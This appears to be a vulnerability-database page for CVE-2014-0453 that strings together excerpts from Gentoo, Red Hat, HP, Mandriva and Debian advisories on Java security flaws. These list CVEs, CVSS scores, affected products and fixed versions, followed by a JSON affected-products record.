CVE-2014-4219 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-4219 [ 42 ] CVE-2014-4220 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-4220 [ 43 ] CVE-2014-4221 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-4221 [ 44 ] CVE-2014-4223 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-4223 [ 45 ] CVE-2014-4227 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-4227 [ 46 ] CVE-2014-4244 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-4244 [ 47 ] CVE-2014-4247 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-4247 [ 48 ] CVE-2014-4252 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-4252 [ 49 ] CVE-2014-4262 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-4262 [ 50 ] CVE-2014-4263 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-4263 [ 51 ] CVE-2014-4264 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-4264 [ 52 ] CVE-2014-4265 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-4265 [ 53 ] CVE-2014-4266 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-4266 [ 54 ] CVE-2014-4268 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-4268 [ 55 ] CVE-2014-4288 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-4288 [ 56 ] CVE-2014-6456 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-6456 [ 57 ] CVE-2014-6457 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-6457 [ 58 ] CVE-2014-6458 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-6458 [ 59 ] CVE-2014-6466 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-6466 [ 60 ] CVE-2014-6468 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-6468 [ 61 ] CVE-2014-6476 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-6476 [ 62 ] CVE-2014-6485 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-6485 [ 63 ] CVE-2014-6492 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-6492 [ 64 ] CVE-2014-6493 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-6493 [ 65 ] CVE-2014-6502 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-6502 [ 66 ] CVE-2014-6503 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-6503 [ 67 ] CVE-2014-6504 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-6504 [ 68 ] CVE-2014-6506 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-6506 [ 69 ] CVE-2014-6511 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-6511 [ 70 ] CVE-2014-6512 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-6512 [ 71 ] CVE-2014-6513 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-6513 [ 72 ] CVE-2014-6515 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-6515 [ 73 ] CVE-2014-6517 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-6517 [ 74 ] CVE-2014-6519 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-6519 [ 75 ] CVE-2014-6527 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-6527 [ 76 ] CVE-2014-6531 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-6531 [ 77 ] CVE-2014-6532 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-6532 [ 78 ] CVE-2014-6558 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-6558 [ 79 ] CVE-2014-6562 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-6562
Availability
This GLSA and any updates to it are available for viewing at the Gentoo Security Website:
http://security.gentoo.org/glsa/glsa-201502-12.xml
Concerns?
Security is a primary focus of Gentoo Linux and ensuring the confidentiality and security of our users' machines is of utmost importance to us. Any security concerns should be addressed to security@gentoo.org or alternatively, you may file a bug at https://bugs.gentoo.org.
License
Copyright 2015 Gentoo Foundation, Inc; referenced text belongs to its owner(s).
The contents of this document are licensed under the Creative Commons - Attribution / Share Alike license.
http://creativecommons.org/licenses/by-sa/2.5 . In a typical operating environment, these are of low security risk as the runtime is not used on untrusted applets. Bugs fixed (https://bugzilla.redhat.com/):
1031734 - CVE-2013-6629 libjpeg: information leak (read of uninitialized memory) 1045561 - CVE-2013-6954 libpng: unhandled zero-length PLTE chunk or NULL palette 1051519 - CVE-2014-0428 OpenJDK: insufficient security checks in IIOP streams (CORBA, 8025767) 1051528 - CVE-2014-0422 OpenJDK: insufficient package access checks in the Naming component (JNDI, 8025758) 1051699 - CVE-2014-0373 OpenJDK: SnmpStatusException handling issues (Serviceability, 7068126) 1051823 - CVE-2013-5878 OpenJDK: null xmlns handling issue (Security, 8025026) 1051911 - CVE-2013-5884 OpenJDK: insufficient security checks in CORBA stub factories (CORBA, 8026193) 1051912 - CVE-2014-0416 OpenJDK: insecure subject principals set handling (JAAS, 8024306) 1051923 - CVE-2014-0376 OpenJDK: document builder missing security checks (JAXP, 8027201, 8025018) 1052915 - CVE-2013-5907 ICU: Layout Engine LookupProcessor insufficient input checks (JDK 2D, 8025034) 1052919 - CVE-2014-0368 OpenJDK: insufficient Socket checkListen checks (Networking, 8011786) 1052942 - CVE-2013-5910 OpenJDK: XML canonicalizer mutable strings passed to untrusted code (Security, 8026417) 1053010 - CVE-2014-0411 OpenJDK: TLS/SSL handshake timing issues (JSSE, 8023069) 1053066 - CVE-2014-0423 OpenJDK: XXE issue in decoder (Beans, 8023245) 1053266 - CVE-2013-5896 OpenJDK: com.sun.corba.se.
Release Date: 2014-08-19 Last Updated: 2014-08-19
Potential Security Impact: Remote unauthorized access, disclosure of information, and other vulnerabilities
Source: Hewlett-Packard Company, HP Software Security Response Team
VULNERABILITY SUMMARY Potential security vulnerabilities have been identified in Java Runtime Environment (JRE) and Java Developer Kit (JDK) running on HP-UX. These vulnerabilities could allow remote unauthorized access, disclosure of information, and other vulnerabilities.
References:
CVE-2013-6629
CVE-2013-6954
CVE-2014-0432
CVE-2014-0446
CVE-2014-0448
CVE-2014-0449
CVE-2014-0451
CVE-2014-0452
CVE-2014-0453
CVE-2014-0454
CVE-2014-0455
CVE-2014-0456
CVE-2014-0458
CVE-2014-0459
CVE-2014-0460
CVE-2014-0461
CVE-2014-1876
CVE-2014-2397
CVE-2014-2398
CVE-2014-2401
CVE-2014-2402
CVE-2014-2403
CVE-2014-2409
CVE-2014-2412
CVE-2014-2413
CVE-2014-2414
CVE-2014-2420
CVE-2014-2421
CVE-2014-2422
CVE-2014-2423
CVE-2014-2427
CVE-2014-2428
CVE-2014-2483
CVE-2014-2490
CVE-2014-4208
CVE-2014-4209
CVE-2014-4216
CVE-2014-4218
CVE-2014-4220
CVE-2014-4221
CVE-2014-4223
CVE-2014-4244
CVE-2014-4252
CVE-2014-4262
CVE-2014-4263
CVE-2014-4264
CVE-2014-4265
CVE-2014-4266
CVE-2014-4268
SUPPORTED SOFTWARE VERSIONS*: ONLY impacted versions are listed. HP-UX B.11.23, and B.11.31 running HP JDK and JRE v7.0.09 and earlier.
BACKGROUND
CVSS 2.0 Base Metrics
Reference Base Vector Base Score CVE-2013-6629 (AV:N/AC:L/Au:N/C:P/I:N/A:N) 5.0 CVE-2013-6954 (AV:N/AC:L/Au:N/C:N/I:N/A:P) 5.0 CVE-2014-0432 (AV:N/AC:M/Au:N/C:C/I:C/A:C) 9.3 CVE-2014-0446 (AV:N/AC:L/Au:N/C:P/I:P/A:P) 7.5 CVE-2014-0448 (AV:N/AC:H/Au:N/C:C/I:C/A:C) 7.6 CVE-2014-0449 (AV:N/AC:L/Au:N/C:P/I:N/A:N) 5.0 CVE-2014-0451 (AV:N/AC:L/Au:N/C:P/I:P/A:P) 7.5 CVE-2014-0452 (AV:N/AC:L/Au:N/C:P/I:P/A:P) 7.5 CVE-2014-0453 (AV:N/AC:H/Au:N/C:P/I:P/A:N) 4.0 CVE-2014-0454 (AV:N/AC:L/Au:N/C:P/I:P/A:P) 7.5 CVE-2014-0455 (AV:N/AC:M/Au:N/C:C/I:C/A:C) 9.3 CVE-2014-0456 (AV:N/AC:L/Au:N/C:C/I:C/A:C) 10.0 CVE-2014-0458 (AV:N/AC:L/Au:N/C:P/I:P/A:P) 7.5 CVE-2014-0459 (AV:N/AC:M/Au:N/C:N/I:N/A:P) 4.3 CVE-2014-0460 (AV:N/AC:M/Au:N/C:P/I:P/A:N) 5.8 CVE-2014-0461 (AV:N/AC:M/Au:N/C:C/I:C/A:C) 9.3 CVE-2014-1876 (AV:L/AC:M/Au:N/C:P/I:P/A:P) 4.4 CVE-2014-2397 (AV:N/AC:M/Au:N/C:C/I:C/A:C) 9.3 CVE-2014-2398 (AV:N/AC:M/Au:S/C:N/I:P/A:N) 3.5 CVE-2014-2401 (AV:N/AC:L/Au:N/C:N/I:P/A:N) 5.0 CVE-2014-2402 (AV:N/AC:L/Au:N/C:P/I:P/A:P) 7.5 CVE-2014-2403 (AV:N/AC:L/Au:N/C:P/I:N/A:N) 5.0 CVE-2014-2409 (AV:N/AC:L/Au:N/C:P/I:P/A:N) 6.4 CVE-2014-2412 (AV:N/AC:L/Au:N/C:P/I:P/A:P) 7.5 CVE-2014-2413 (AV:N/AC:M/Au:N/C:N/I:P/A:N) 4.3 CVE-2014-2414 (AV:N/AC:L/Au:N/C:P/I:P/A:P) 7.5 CVE-2014-2420 (AV:N/AC:H/Au:N/C:N/I:P/A:N) 2.6 CVE-2014-2421 (AV:N/AC:L/Au:N/C:C/I:C/A:C) 10.0 CVE-2014-2422 (AV:N/AC:M/Au:N/C:P/I:P/A:P) 6.8 CVE-2014-2423 (AV:N/AC:L/Au:N/C:P/I:P/A:P) 7.5 CVE-2014-2427 (AV:N/AC:L/Au:N/C:P/I:P/A:P) 7.5 CVE-2014-2428 (AV:N/AC:H/Au:N/C:C/I:C/A:C) 7.6 CVE-2014-2483 (AV:N/AC:M/Au:N/C:C/I:C/A:C) 9.3 CVE-2014-2490 (AV:N/AC:M/Au:N/C:C/I:C/A:C) 9.3 CVE-2014-4208 (AV:N/AC:H/Au:N/C:N/I:P/A:N) 2.6 CVE-2014-4209 (AV:N/AC:L/Au:N/C:P/I:P/A:N) 6.4 CVE-2014-4216 (AV:N/AC:M/Au:N/C:C/I:C/A:C) 9.3 CVE-2014-4218 (AV:N/AC:L/Au:N/C:N/I:P/A:N) 5.0 CVE-2014-4220 (AV:N/AC:L/Au:N/C:N/I:P/A:N) 5.0 CVE-2014-4221 (AV:N/AC:M/Au:N/C:P/I:N/A:N) 4.3 CVE-2014-4223 (AV:N/AC:M/Au:N/C:C/I:C/A:C) 9.3 CVE-2014-4244 (AV:N/AC:H/Au:N/C:P/I:P/A:N) 4.0 CVE-2014-4252 (AV:N/AC:L/Au:N/C:P/I:N/A:N) 5.0 CVE-2014-4262 (AV:N/AC:M/Au:N/C:C/I:C/A:C) 9.3 CVE-2014-4263 (AV:N/AC:H/Au:N/C:P/I:P/A:N) 4.0 CVE-2014-4264 (AV:N/AC:L/Au:N/C:N/I:N/A:P) 5.0 CVE-2014-4265 (AV:N/AC:L/Au:N/C:N/I:P/A:N) 5.0 CVE-2014-4266 (AV:N/AC:L/Au:N/C:N/I:P/A:N) 5.0 CVE-2014-4268 (AV:N/AC:L/Au:N/C:P/I:N/A:N) 5.0 =========================================================== Information on CVSS is documented in HP Customer Notice: HPSN-2008-002
RESOLUTION
HP has provided the following Java version upgrade to resolve these vulnerabilities.
The upgrade is available from the following location: http://www.hp.com/java
OS Version Release Version Depot Name
HP-UX B.11.23, B.11.31 JDK and JRE v7.0.10 or subsequent Itanium_JDK_JRE_7.0.10_Aug_2014_Java70_1.7.0.10.00_HP-UX_B.11.31_IA.depot
MANUAL ACTIONS: Yes - Update For Java v7.0 update to Java v7.0.10 or subsequent
PRODUCT SPECIFIC INFORMATION HP-UX Software Assistant: HP-UX Software Assistant is an enhanced application that replaces HP-UX Security Patch Check. It analyzes all Security Bulletins issued by HP and lists recommended actions that may apply to a specific HP-UX system. It can also download patches and create a depot automatically. For more information see https://www.hp.com/go/swa
The following text is for use by the HP-UX Software Assistant.
AFFECTED VERSIONS
HP-UX B.11.23 HP-UX B.11.31 =========== Jdk70.JDK70-COM Jdk70.JDK70-DEMO Jdk70.JDK70-IPF32 Jdk70.JDK70-IPF64 Jre70.JRE70-COM Jre70.JRE70-IPF32 Jre70.JRE70-IPF32-HS Jre70.JRE70-IPF64 Jre70.JRE70-IPF64-HS action: install revision 1.7.0.10.00 or subsequent
END AFFECTED VERSIONS
HISTORY Version:1 (rev.1) - 19 August 2014 Initial release
Third Party Security Patches: Third party security patches that are to be installed on systems running HP software products should be applied in accordance with the customer's patch management policy.
Support: For issues about implementing the recommendations of this Security Bulletin, contact normal HP Services support channel. For other issues about the content of this Security Bulletin, send e-mail to security-alert@hp.com.
Report: To report a potential security vulnerability with any HP supported product, send Email to: security-alert@hp.com
Subscribe: To initiate a subscription to receive future HP Security Bulletin alerts via Email: http://h41183.www4.hp.com/signup_alerts.php?jumpid=hpsc_secbulletins
Security Bulletin Archive: A list of recently released Security Bulletins is available here: https://h20564.www2.hp.com/portal/site/hpsc/public/kb/secBullArchive/
Software Product Category: The Software Product Category is represented in the title by the two characters following HPSB.
3C = 3COM 3P = 3rd Party Software GN = HP General Software HF = HP Hardware and Firmware MP = MPE/iX MU = Multi-Platform Software NS = NonStop Servers OV = OpenVMS PI = Printing and Imaging PV = ProCurve ST = Storage Software TU = Tru64 UNIX UX = HP-UX
Copyright 2014 Hewlett-Packard Development Company, L.P. Hewlett-Packard Company shall not be liable for technical or editorial errors or omissions contained herein. The information provided is provided "as is" without warranty of any kind. To the extent permitted by law, neither HP or its affiliates, subcontractors or suppliers will be liable for incidental,special or consequential damages including downtime cost; lost profits; damages relating to the procurement of substitute products or services; or damages for loss of data, or software restoration. The information in this document is subject to change without notice. Hewlett-Packard Company and the names of Hewlett-Packard products referenced herein are trademarks of Hewlett-Packard Company in the United States and other countries. Other product and company names mentioned herein may be trademarks of their respective owners.
Note that the CVE-2014-0459 issue is in the lcms2 library, which has been patched to correct this flaw. The verification of md5 checksums and GPG signatures is performed automatically for you. You can obtain the GPG public key of the Mandriva Security Team by executing:
gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98
You can view other update advisories for Mandriva Linux at:
http://www.mandriva.com/en/support/security/advisories/
If you want to report vulnerabilities, please contact
security_(at)_mandriva.com
Type Bits/KeyID Date User ID pub 1024D/22458A98 2000-07-10 Mandriva Security Team -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.4.12 (GNU/Linux)
iD8DBQFTdfckmqjQ0CJFipgRArKEAKCIiAR2WkLo3Vb0gzzQ5RDz7hQZ3gCcDC6A 5xOtKkhOvonpLXoqBiAcXWQ= =qBk5 -----END PGP SIGNATURE----- .
For the oldstable distribution (squeeze), these problems have been fixed in version 6b31-1.13.3-1~deb6u1.
For the stable distribution (wheezy), these problems have been fixed in version 6b31-1.13.3-1~deb7u1.
For the testing distribution (jessie), these problems have been fixed in version 6b31-1.13.3-1.
For the unstable distribution (sid), these problems have been fixed in version 6b31-1.13.3-1
Show details on source website{ "@context": { "@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#", "affected_products": { "@id": "https://www.variotdbs.pl/ref/affected_products" }, "configurations": { "@id": "https://www.variotdbs.pl/ref/configurations" }, "credits": { "@id": "https://www.variotdbs.pl/ref/credits" }, "cvss": { "@id": "https://www.variotdbs.pl/ref/cvss/" }, "description": { "@id": "https://www.variotdbs.pl/ref/description/" }, "exploit_availability": { "@id": "https://www.variotdbs.pl/ref/exploit_availability/" }, "external_ids": { "@id": "https://www.variotdbs.pl/ref/external_ids/" }, "iot": { "@id": "https://www.variotdbs.pl/ref/iot/" }, "iot_taxonomy": { "@id": "https://www.variotdbs.pl/ref/iot_taxonomy/" }, "patch": { "@id": "https://www.variotdbs.pl/ref/patch/" }, "problemtype_data": { "@id": "https://www.variotdbs.pl/ref/problemtype_data/" }, "references": { "@id": "https://www.variotdbs.pl/ref/references/" }, "sources": { "@id": "https://www.variotdbs.pl/ref/sources/" }, "sources_release_date": { "@id": "https://www.variotdbs.pl/ref/sources_release_date/" }, "sources_update_date": { "@id": "https://www.variotdbs.pl/ref/sources_update_date/" }, "threat_type": { "@id": "https://www.variotdbs.pl/ref/threat_type/" }, "title": { "@id": "https://www.variotdbs.pl/ref/title/" }, "type": { "@id": "https://www.variotdbs.pl/ref/type/" } }, "@id": "https://www.variotdbs.pl/vuln/VAR-201404-0374", "affected_products": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/affected_products#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" }, "@id": "https://www.variotdbs.pl/ref/sources" } }, "data": [ { "model": "jrockit", "scope": "eq", "trust": 2.4, "vendor": "oracle", "version": "r28.3.1" }, { "model": "jrockit", "scope": "eq", "trust": 1.8, "vendor": "oracle", "version": "r27.8.1" }, { "model": "ubuntu linux", "scope": "eq", "trust": 1.0, "vendor": "canonical", "version": "12.04" }, { "model": "forms viewer", "scope": "gte", "trust": 1.0, "vendor": "ibm", "version": "4.0.0" }, { "model": "ubuntu linux", "scope": "eq", "trust": 1.0, "vendor": "canonical", "version": "13.10" }, { "model": "jre", "scope": "eq", "trust": 1.0, "vendor": "oracle", "version": "1.7.0" }, { "model": "linux", "scope": "eq", "trust": 1.0, "vendor": "debian", "version": "6.0" }, { "model": "forms viewer", "scope": "lt", "trust": 1.0, "vendor": "ibm", "version": "4.0.0.3" }, { "model": "forms viewer", "scope": "lt", "trust": 1.0, "vendor": "ibm", "version": "8.0.1.1" }, { "model": "jre", "scope": "eq", "trust": 1.0, "vendor": "oracle", "version": "1.6.0" }, { "model": "jdk", "scope": "eq", "trust": 1.0, "vendor": "oracle", "version": "1.7.0" }, { "model": "linux", "scope": "eq", "trust": 1.0, "vendor": "debian", "version": "7.0" }, { "model": "jdk", "scope": "eq", "trust": 1.0, "vendor": "oracle", "version": "1.6.0" }, { "model": "jre", "scope": "eq", "trust": 1.0, "vendor": "oracle", "version": "1.5.0" }, { "model": "jre", "scope": "eq", "trust": 1.0, "vendor": "oracle", "version": "1.8.0" }, { "model": "ubuntu linux", "scope": "eq", "trust": 1.0, "vendor": "canonical", "version": "14.04" }, { "model": "forms viewer", "scope": "gte", "trust": 1.0, "vendor": "ibm", "version": "8.0.0" }, { "model": "junos space", "scope": "lt", "trust": 1.0, "vendor": "juniper", "version": "15.1" }, { "model": "jdk", "scope": "eq", "trust": 1.0, "vendor": "oracle", "version": "1.5.0" }, { "model": "jdk", "scope": "eq", "trust": 1.0, "vendor": "oracle", "version": "1.8.0" }, { "model": "ubuntu linux", "scope": "eq", "trust": 1.0, "vendor": "canonical", "version": "12.10" }, { "model": "linux", "scope": "eq", "trust": 1.0, "vendor": "debian", "version": "8.0" }, { "model": "ubuntu linux", "scope": "eq", "trust": 1.0, "vendor": "canonical", "version": "10.04" }, { "model": "api management", "scope": "eq", "trust": 0.8, "vendor": "ibm", "version": "2.0.0.0" }, { "model": "api management", "scope": "eq", "trust": 0.8, "vendor": "ibm", "version": "2.0.0.1" }, { "model": "api management", "scope": "eq", "trust": 0.8, "vendor": "ibm", "version": "2.0.0.2" }, { "model": "api management", "scope": "eq", "trust": 0.8, "vendor": "ibm", "version": "3.0.0.0" }, { "model": "domino", "scope": "lte", "trust": 0.8, "vendor": "ibm", "version": "8.5.3 fix pack 6" }, { "model": "domino", "scope": "lte", "trust": 0.8, "vendor": "ibm", "version": "9.0.1 fix pack 1" }, { "model": "fabric manager", "scope": "lte", "trust": 0.8, "vendor": "ibm", "version": "4.1.00.22" }, { "model": "financial transaction manager", "scope": "eq", "trust": 0.8, "vendor": "ibm", "version": "for ach services 2.1.1.0" }, { "model": "financial transaction manager", "scope": "eq", "trust": 0.8, "vendor": "ibm", "version": "for check services 2.1.1.2" }, { "model": "financial transaction manager", "scope": "eq", "trust": 0.8, "vendor": "ibm", "version": "for check services 2.1.1.5" }, { "model": "financial transaction manager", "scope": "eq", "trust": 0.8, "vendor": "ibm", "version": "for corporate payment services 2.1.1.0" }, { "model": "ims enterprise suite", "scope": "eq", "trust": 0.8, "vendor": "ibm", "version": "of soap gateway 2.1" }, { "model": "ims enterprise suite", "scope": "eq", "trust": 0.8, "vendor": "ibm", "version": "of soap gateway 2.2" }, { "model": "ims enterprise suite", "scope": "eq", "trust": 0.8, "vendor": "ibm", "version": "of soap gateway 3.1" }, { "model": "infosphere data replication", "scope": "eq", "trust": 0.8, "vendor": "ibm", "version": "dashboard 10.1" }, { "model": "infosphere data replication", "scope": "eq", "trust": 0.8, "vendor": "ibm", "version": "dashboard 10.2" }, { "model": "infosphere data replication", "scope": "eq", "trust": 0.8, "vendor": "ibm", "version": "dashboard 10.2.1" }, { "model": "infosphere data replication", "scope": "eq", "trust": 0.8, "vendor": "ibm", "version": "dashboard 9.7" }, { "model": "infosphere streams", "scope": "eq", "trust": 0.8, "vendor": "ibm", "version": "1.0.1" }, { "model": "infosphere streams", "scope": "eq", "trust": 0.8, "vendor": "ibm", "version": "3.2.1" }, { "model": "infosphere streams", "scope": "eq", "trust": 0.8, "vendor": "ibm", "version": "version 1.0" }, { "model": "infosphere streams", "scope": "eq", "trust": 0.8, "vendor": "ibm", "version": "version 2.0" }, { "model": "infosphere streams", "scope": "eq", "trust": 0.8, "vendor": "ibm", "version": "version 3.0" }, { "model": "infosphere streams", "scope": "eq", "trust": 0.8, "vendor": "ibm", "version": "version 3.1" }, { "model": "infosphere streams", "scope": "eq", "trust": 0.8, "vendor": "ibm", "version": "version 3.2" }, { "model": "lotus quickr", "scope": "eq", "trust": 0.8, "vendor": "ibm", "version": "8.5 for websphere portal" }, { "model": "multi-enterprise integration gateway", "scope": "eq", "trust": 0.8, "vendor": "ibm", "version": "1.0" }, { "model": "notes", "scope": "lte", "trust": 0.8, "vendor": "ibm", "version": "8.5.3 fix pack 6" }, { "model": "notes", "scope": "lte", "trust": 0.8, "vendor": "ibm", "version": "9.0.1 fix pack 1" }, { "model": "operational decision manager", "scope": "eq", "trust": 0.8, "vendor": "ibm", "version": "8.0" }, { "model": "operational decision manager", "scope": "eq", "trust": 0.8, "vendor": "ibm", "version": "8.5" }, { "model": "operational decision manager", "scope": "eq", "trust": 0.8, "vendor": "ibm", "version": "8.6" }, { "model": "security access manager for mobile the appliance", "scope": null, "trust": 0.8, "vendor": "ibm", "version": null }, { "model": "security access manager for mobile software", "scope": "eq", "trust": 0.8, "vendor": "ibm", "version": "8.0" }, { "model": "security access manager for web the appliance", "scope": null, "trust": 0.8, "vendor": "ibm", "version": null }, { "model": "security access manager for web software", "scope": "eq", "trust": 0.8, "vendor": "ibm", "version": "7.0" }, { "model": "security access manager for web software", "scope": "eq", "trust": 0.8, "vendor": "ibm", "version": "8.0" }, { "model": "smartcloud provisioning", "scope": "eq", "trust": 0.8, "vendor": "ibm", "version": "1.2" }, { "model": "smartcloud provisioning", "scope": "eq", "trust": 0.8, "vendor": "ibm", "version": "2.1 to 2.1 fix pack 4" }, { "model": "smartcloud provisioning", "scope": "eq", "trust": 0.8, "vendor": "ibm", "version": "2.3" }, { "model": "smartcloud provisioning", "scope": "eq", "trust": 0.8, "vendor": "ibm", "version": "2.3 fix pack 1" }, { "model": "websphere business events", "scope": "eq", "trust": 0.8, "vendor": "ibm", "version": "7.0" }, { "model": "websphere ilog jrules", "scope": "eq", "trust": 0.8, "vendor": "ibm", "version": "7.0" }, { "model": "websphere ilog jrules", "scope": "eq", "trust": 0.8, "vendor": "ibm", "version": "7.1" }, { "model": "websphere operational decision management", "scope": "eq", "trust": 0.8, "vendor": "ibm", "version": "7.5" }, { "model": "rational connector for sap solution manager", "scope": "eq", "trust": 0.8, "vendor": "ibm", "version": "4.0.0.x" }, { "model": "websphere cast iron", "scope": "eq", "trust": 0.8, "vendor": "ibm", "version": "6.0 (studio)" }, { "model": "websphere cast iron", "scope": "eq", "trust": 0.8, "vendor": "ibm", "version": "6.1 (studio)" }, { "model": "websphere cast iron", "scope": "eq", "trust": 0.8, "vendor": "ibm", "version": "6.3 (studio)" }, { "model": "websphere cast iron", "scope": "eq", "trust": 0.8, "vendor": "ibm", "version": "6.4 (studio)" }, { "model": "websphere cast iron", "scope": "eq", "trust": 0.8, "vendor": "ibm", "version": "7.0 (studio)" }, { "model": "websphere cast iron", "scope": "eq", "trust": 0.8, "vendor": "ibm", "version": "live 6.3 (saas offering)" }, { "model": "websphere cast iron", "scope": "eq", "trust": 0.8, "vendor": "ibm", "version": "live 7.0 (saas offering)" }, { "model": "websphere cast iron cloud integration virtual appliance", "scope": null, "trust": 0.8, "vendor": "ibm", "version": null }, { "model": "websphere cast iron cloud integration physical appliance", "scope": null, "trust": 0.8, "vendor": "ibm", "version": null }, { "model": "jdk", "scope": "eq", "trust": 0.8, "vendor": "oracle", "version": "5.0 update 61" }, { "model": "jdk", "scope": "eq", "trust": 0.8, "vendor": "oracle", "version": "6 update 71" }, { "model": "jdk", "scope": "eq", "trust": 0.8, "vendor": "oracle", "version": "7 update 51" }, { "model": "jdk", "scope": "eq", "trust": 0.8, "vendor": "oracle", "version": "8" }, { "model": "jre", "scope": "eq", "trust": 0.8, "vendor": "oracle", "version": "5.0 update 61" }, { "model": "jre", "scope": "eq", "trust": 0.8, "vendor": "oracle", "version": "6 update 71" }, { "model": "jre", "scope": "eq", "trust": 0.8, "vendor": "oracle", "version": "7 update 51" }, { "model": "jre", "scope": "eq", "trust": 0.8, "vendor": "oracle", "version": "8" }, { "model": "java se", "scope": "eq", "trust": 0.8, "vendor": "oracle", "version": "embedded 7 update 51" }, { "model": "cosminexus application server enterprise", "scope": "eq", "trust": 0.8, "vendor": "hitachi", "version": "version 6" }, { "model": "cosminexus application server standard", "scope": "eq", "trust": 0.8, "vendor": "hitachi", "version": "version 6" }, { "model": "cosminexus application server version 5", "scope": null, "trust": 0.8, "vendor": "hitachi", "version": null }, { "model": "cosminexus client", "scope": "eq", "trust": 0.8, "vendor": "hitachi", "version": "version 6" }, { "model": "cosminexus developer light version 6", "scope": null, "trust": 0.8, "vendor": "hitachi", "version": null }, { "model": "cosminexus developer professional version 6", "scope": null, "trust": 0.8, "vendor": "hitachi", "version": null }, { "model": "cosminexus developer standard version 6", "scope": null, "trust": 0.8, "vendor": "hitachi", "version": null }, { "model": "cosminexus developer version 5", "scope": null, "trust": 0.8, "vendor": "hitachi", "version": null }, { "model": "cosminexus developer\u0027s kit for java", "scope": null, "trust": 0.8, "vendor": "hitachi", "version": null }, { "model": "cosminexus primary server", "scope": "eq", "trust": 0.8, "vendor": "hitachi", "version": "base" }, { "model": "cosminexus studio", "scope": "eq", "trust": 0.8, "vendor": "hitachi", "version": "version 5" }, { "model": "ucosminexus application server", "scope": "eq", "trust": 0.8, "vendor": "hitachi", "version": "-r" }, { "model": "ucosminexus application server", "scope": "eq", "trust": 0.8, "vendor": "hitachi", "version": "express" }, { "model": "ucosminexus application server", "scope": "eq", "trust": 0.8, "vendor": "hitachi", "version": "light" }, { "model": "ucosminexus application server", "scope": "eq", "trust": 0.8, "vendor": "hitachi", "version": "standard-r" }, { "model": "ucosminexus application server enterprise", "scope": null, "trust": 0.8, "vendor": "hitachi", "version": null }, { "model": "ucosminexus application server smart edition", "scope": null, "trust": 0.8, "vendor": "hitachi", "version": null }, { "model": "ucosminexus application server standard", "scope": null, "trust": 0.8, "vendor": "hitachi", "version": null }, { "model": "ucosminexus client", "scope": "eq", "trust": 0.8, "vendor": "hitachi", "version": "none" }, { "model": "ucosminexus client", "scope": "eq", "trust": 0.8, "vendor": "hitachi", "version": "for plug-in" }, { "model": "ucosminexus developer", "scope": "eq", "trust": 0.8, "vendor": "hitachi", "version": "01" }, { "model": "ucosminexus developer", "scope": "eq", "trust": 0.8, "vendor": "hitachi", "version": "professional" }, { "model": "ucosminexus developer", "scope": "eq", "trust": 0.8, "vendor": "hitachi", "version": "professional for plug-in" }, { "model": "ucosminexus developer light", "scope": null, "trust": 0.8, "vendor": "hitachi", "version": null }, { "model": "ucosminexus developer standard", "scope": null, "trust": 0.8, "vendor": "hitachi", "version": null }, { "model": "ucosminexus operator", "scope": null, "trust": 0.8, "vendor": "hitachi", "version": null }, { "model": "ucosminexus primary server", "scope": "eq", "trust": 0.8, "vendor": "hitachi", "version": "base" }, { "model": "ucosminexus server", "scope": "eq", "trust": 0.8, "vendor": "hitachi", "version": "standard-r" }, { "model": "ucosminexus service architect", "scope": null, "trust": 0.8, "vendor": "hitachi", "version": null }, { "model": "ucosminexus service platform", "scope": "eq", "trust": 0.8, "vendor": "hitachi", "version": "none" }, { "model": "ucosminexus service platform", "scope": "eq", "trust": 0.8, "vendor": "hitachi", "version": "- messaging" } ], "sources": [ { "db": "JVNDB", "id": "JVNDB-2014-002089" }, { "db": "CNNVD", "id": "CNNVD-201404-268" }, { "db": "NVD", "id": "CVE-2014-0453" } ] }, "configurations": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/configurations#", "children": { "@container": "@list" }, "cpe_match": { "@container": "@list" }, "data": { "@container": "@list" }, "nodes": { "@container": "@list" } }, "data": [ { "CVE_data_version": "4.0", "nodes": [ { "cpe_match": [ { "cpe22Uri": "cpe:/a:ibm:api_management", "vulnerable": true }, { "cpe22Uri": "cpe:/a:ibm:lotus_domino", "vulnerable": true }, 